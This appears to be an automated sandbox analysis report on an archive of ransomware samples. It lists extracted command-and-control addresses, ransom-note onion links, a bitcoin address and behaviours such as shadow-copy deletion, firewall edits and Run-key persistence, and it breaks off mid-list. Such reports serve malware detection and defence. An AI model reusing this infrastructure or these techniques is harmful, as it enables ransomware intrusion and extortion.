Resubmissions
28-10-2024 00:19
241028-al8bfswbrc 327-10-2024 06:22
241027-g46znsslhr 126-10-2024 10:54
241026-mzm9natclb 325-10-2024 21:14
241025-z3q6yavdmb 10Analysis
-
max time kernel
77s -
max time network
302s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-10-2024 21:14
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00436.7z
Resource
win10v2004-20241007-en
General
-
Target
RNSM00436.7z
-
Size
70.2MB
-
MD5
5203ef0108208cd0f82278c15b5ef62d
-
SHA1
caf7e1b519073e78d82ab479cef4eda3dfb2081e
-
SHA256
54efded0c82f76a168ee6aa0fbf96f54693eb1d1c1b12c6a733ceb24d40c497e
-
SHA512
83f416c07c49f587d7a57dbefe3a65a7169e022085c6938c93a8ab0c53b00cb54c22a404156aa8d93b7173a79039f6d59a9cf6adc16cec65d4d1a92827d805fa
-
SSDEEP
1572864:LYLhPSFGAnRCNq06snfEMDuuqTXzUiaYlOiqn3TdvGcICnYP:sLlSFbnUfxKuqbQiaYlT+3pvf5y
Malware Config
Extracted
crimsonrat
151.106.14.125
212.200.120.154
Extracted
njrat
0.7d
H-Face
aqq.linkpc.net:999
b707d48a130b129126b45cd0625853bc
-
reg_key
b707d48a130b129126b45cd0625853bc
-
splitter
|'|'|
Extracted
danabot
1827
3
184.95.51.183:443
184.95.51.175:443
192.210.198.12:443
184.95.51.180:443
-
embedded_hash
AEF96B4D339B580ABB737F203C2D0F52
-
type
main
Extracted
urelas
1.234.83.146
133.242.129.155
218.54.31.226
218.54.30.235
218.54.31.165
Extracted
C:\ProgramData\regid.1991-06.com.microsoft\305E39-Readme.txt
http://pb36hu4spl6cyjdfhing7h3pw6dhpk32ifemawkujj4gp33ejzdq3did.onion
http://rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion
Extracted
asyncrat
0.5.7B
Default
revros.ddns.net:6606
revros.ddns.net:7707
revros.ddns.net:8808
Microsoft_Azure
-
delay
3
-
install
true
-
install_file
Update.exe
-
install_folder
%Temp%
Extracted
C:\Users\Admin\Desktop\00436\@[email protected]
wannacry
12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
Extracted
C:\Recovery\s4keqdh4fb-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6E35E64715104E13
http://decoder.re/6E35E64715104E13
Extracted
C:\Users\Admin\README.1d46f1f8.TXT
darkside
http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT
Extracted
latentbot
foxmyfox132.zapto.org
Signatures
-
Asyncrat family
-
CrimsonRAT main payload 1 IoCs
resource yara_rule behavioral1/files/0x000a000000023b78-137.dat family_crimsonrat -
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
Crimsonrat family
-
Danabot family
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Darkside family
-
Detect MafiaWare666 ransomware 2 IoCs
resource yara_rule behavioral1/files/0x0008000000023c57-173.dat family_mafiaware666 behavioral1/memory/3440-179-0x00000000008C0000-0x000000000090A000-memory.dmp family_mafiaware666 -
GandCrab payload 2 IoCs
resource yara_rule behavioral1/memory/2276-164-0x0000000000530000-0x0000000000547000-memory.dmp family_gandcrab behavioral1/memory/2276-163-0x0000000000400000-0x0000000000460000-memory.dmp family_gandcrab -
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Gandcrab family
-
Latentbot family
-
MafiaWare666 Ransomware
MafiaWare666 is ransomware written in C# with multiple variants.
-
Mafiaware666 family
-
Modifies firewall policy service 3 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Users\Admin\K-37763-383-2847-00\winsrc.exe = "C:\\Users\\Admin\\K-37763-383-2847-00\\winsrc.exe:*:Enabled:Microsoft® Windows Service" Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe -
Njrat family
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Sodinokibi family
-
Urelas family
-
VanillaRat
VanillaRat is an advanced remote administration tool coded in C#.
-
Vanillarat family
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Wannacry family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (153) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Vanilla Rat payload 2 IoCs
resource yara_rule behavioral1/files/0x000c000000023b72-114.dat vanillarat behavioral1/memory/956-130-0x0000000000BE0000-0x0000000000C02000-memory.dmp vanillarat -
Blocklisted process makes network request 1 IoCs
flow pid Process 59 3688 RUNDLL32.EXE -
Modifies Windows Firewall 2 TTPs 4 IoCs
pid Process 1692 netsh.exe 15224 netsh.exe 17364 netsh.exe 11968 netsh.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\frAQBc8Wsa1xVPfv\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\frAQBc8Wsa1xVPfv" KA57j.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation File2.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Blocker.jhat-2de9dda59b7761de1a9b33641753443c4c3e477fec3bf9b88182062f03ec0608.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Blocker.gen-cebc7e39289aece621aee501077f89afb9d47e26453e940e0c111246e2bf84e8.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Encoder.mjb-917cf2ed059e7975f294f97be66df901a8d70d6077fc64396a5c9e2bc47b9290.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Bitman.aiyl-33265f47eeaf55e96e5e3c3bf600c585dfc1a3c9562e8891342956a6c033d2c1.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Gen.gen-0a18a0f93588ad4d852d50ec68f594b21babcb9889b90f2134e2f04f82f8b6b0.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 29 IoCs
pid Process 956 HEUR-Trojan-Ransom.MSIL.Blocker.gen-649d5c728c759d6185e1420b9eeaeb370ae7c080782b7a0565cedb7b53c2c50d.exe 4872 HEUR-Trojan-Ransom.MSIL.Blocker.gen-a1d6d6618d366d7f5e4f2eef7ed3d5f195b6ea591ea3067270a34f67d2ca2de6.exe 5056 HEUR-Trojan-Ransom.MSIL.Blocker.gen-cebc7e39289aece621aee501077f89afb9d47e26453e940e0c111246e2bf84e8.exe 2876 HEUR-Trojan-Ransom.MSIL.Encoder.gen-fb81347ec3a8abc5259abd425aa435ab166eb69a5c76baef19ae23f6455c1484.exe 3228 HEUR-Trojan-Ransom.MSIL.Foreign.gen-f0c73e683743fcaf091322ee875d7bd76475adfb86d80af384d809177b945696.exe 2928 HEUR-Trojan-Ransom.MSIL.Gen.gen-0a18a0f93588ad4d852d50ec68f594b21babcb9889b90f2134e2f04f82f8b6b0.exe 4644 HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe 2276 HEUR-Trojan-Ransom.Win32.GandCrypt.gen-1af0659e1375552c88339146c38d870f9808fd4bfcf93d026aa0698aa89cdf23.exe 3432 HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe 1600 HEUR-Trojan-Ransom.Win32.Stop.gen-8a9aa2c6397edec14772b76171a223259ec3190e3cef4cf6774d2eb9435a30f6.exe 3440 File1.exe 2156 File2.exe 4292 Trojan-Ransom.Win32.Bitman.aiyl-33265f47eeaf55e96e5e3c3bf600c585dfc1a3c9562e8891342956a6c033d2c1.exe 3532 Trojan-Ransom.Win32.Blocker.jhat-2de9dda59b7761de1a9b33641753443c4c3e477fec3bf9b88182062f03ec0608.exe 4512 ddd.exe 4412 System64.exe 2036 Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe 4136 Trojan-Ransom.Win32.Blocker.nage-ebe3c86f238c4b3cbe2d52e93471c1ca94cb7c9d449108300294256e837a71a9.exe 64 Trojan-Ransom.Win32.Cryptor.eev-89cc8fa7a2d2fef1b7e292682121cc65dedb8e0d5cd926977dfae49f25410f4c.exe 5156 Trojan-Ransom.Win32.Darkside.m-1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe 5484 sihost64.exe 5592 Trojan-Ransom.Win32.Encoder.mjb-917cf2ed059e7975f294f97be66df901a8d70d6077fc64396a5c9e2bc47b9290.exe 5960 Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe 6048 Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe 6128 KA57j.exe 224 Trojan-Ransom.Win32.GandCrypt.abw-9becd904847b2dabd1a03df45210d7233fdda9927eac6d87c75bab53947ce5f1.exe 1532 winsrc.exe 3628 winsrc.exe 5328 Trojan-Ransom.Win32.Gen.abhj-633267a15766e9e6ac4dc3e2f3ea2e66b5146eb0e8980cf70f4bd2786680d573.exe -
Loads dropped DLL 5 IoCs
pid Process 640 rundll32.exe 640 rundll32.exe 3688 RUNDLL32.EXE 3688 RUNDLL32.EXE 6048 Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 13828 icacls.exe 5552 icacls.exe 11460 icacls.exe 12752 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000a000000023b82-260.dat vmprotect behavioral1/memory/64-310-0x0000000000B90000-0x0000000001846000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xk = "C:\\Windows\\xk.exe" Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSMSGS = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE" Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft® Windows Service = "C:\\Users\\Admin\\K-37763-383-2847-00\\winsrc.exe" Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 5316 powershell.exe 10664 powershell.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Desktop\desktop.ini File1.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\G: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\M: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\N: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\X: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\K: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\O: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\P: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\Q: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\V: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\Z: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\A: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\L: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\S: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\T: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\U: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\F: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\B: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\H: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\I: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\J: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\R: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\W: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe File opened (read-only) \??\Y: HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
pid Process 2824 arp.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\shell.exe Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe File created C:\Windows\SysWOW64\shell.exe Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe File created C:\Windows\SysWOW64\Mig2.scr Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe File created C:\Windows\SysWOW64\IExplorer.exe Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 5960 set thread context of 6048 5960 Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe 156 PID 1532 set thread context of 3628 1532 winsrc.exe 163 -
resource yara_rule behavioral1/files/0x000a000000023b7a-145.dat upx behavioral1/memory/4644-147-0x0000000000400000-0x00000000005BB000-memory.dmp upx behavioral1/files/0x0009000000023c62-170.dat upx behavioral1/files/0x000a000000023b80-226.dat upx behavioral1/memory/2036-227-0x0000000000400000-0x000000000042F000-memory.dmp upx behavioral1/memory/4644-298-0x0000000000400000-0x00000000005BB000-memory.dmp upx behavioral1/memory/2036-401-0x0000000000400000-0x000000000042F000-memory.dmp upx behavioral1/memory/4332-886-0x0000000000400000-0x0000000000487000-memory.dmp upx behavioral1/files/0x0009000000023cc7-915.dat upx behavioral1/memory/5740-935-0x0000000000400000-0x0000000000487000-memory.dmp upx behavioral1/memory/4332-939-0x0000000000400000-0x0000000000487000-memory.dmp upx behavioral1/memory/5740-2159-0x0000000000400000-0x0000000000487000-memory.dmp upx behavioral1/memory/4644-4425-0x0000000000400000-0x00000000005BB000-memory.dmp upx behavioral1/memory/1212-10292-0x0000000000400000-0x000000000042F000-memory.dmp upx behavioral1/memory/2852-10290-0x0000000000400000-0x000000000042F000-memory.dmp upx behavioral1/memory/1212-12238-0x0000000000400000-0x000000000042F000-memory.dmp upx behavioral1/memory/5740-16863-0x0000000000400000-0x0000000000487000-memory.dmp upx behavioral1/memory/15344-17345-0x0000000000400000-0x000000000042F000-memory.dmp upx behavioral1/memory/3900-17350-0x0000000000400000-0x000000000042F000-memory.dmp upx behavioral1/memory/12092-17354-0x0000000000400000-0x000000000042F000-memory.dmp upx behavioral1/memory/12020-17360-0x0000000000400000-0x000000000042F000-memory.dmp upx behavioral1/memory/5756-17365-0x0000000000400000-0x000000000042F000-memory.dmp upx behavioral1/memory/15044-17371-0x0000000000400000-0x000000000042F000-memory.dmp upx behavioral1/memory/9224-17379-0x0000000000400000-0x000000000042F000-memory.dmp upx behavioral1/memory/15924-17430-0x0000000000400000-0x000000000042F000-memory.dmp upx -
Drops file in Program Files directory 54 IoCs
description ioc Process File created C:\Program Files\7-Zip\Lang\an.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\Lang\ba.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\7z.dll.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\Lang\el.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\7-zip.dll.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\Lang\af.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\Lang\be.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\Lang\az.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\7-zip32.dll HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\Lang\ar.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\7-zip.chm.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\7zCon.sfx HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\Lang\ca.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\Lang\af.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\Lang\cs.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\Lang\cy.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\Lang\el.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\7z.dll HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\7z.sfx HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\7zFM.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\7zCon.sfx.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\Lang\da.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\Lang\bg.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\7z.exe.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\7z.sfx.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\7zG.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\Lang\ast.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\Lang\ba.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\7-zip32.dll.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\History.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\Lang\ast.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\Lang\ca.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\Lang\bn.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\7z.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\Lang\be.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\Lang\bn.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\Lang\br.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\Lang\co.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\7zFM.exe.exe 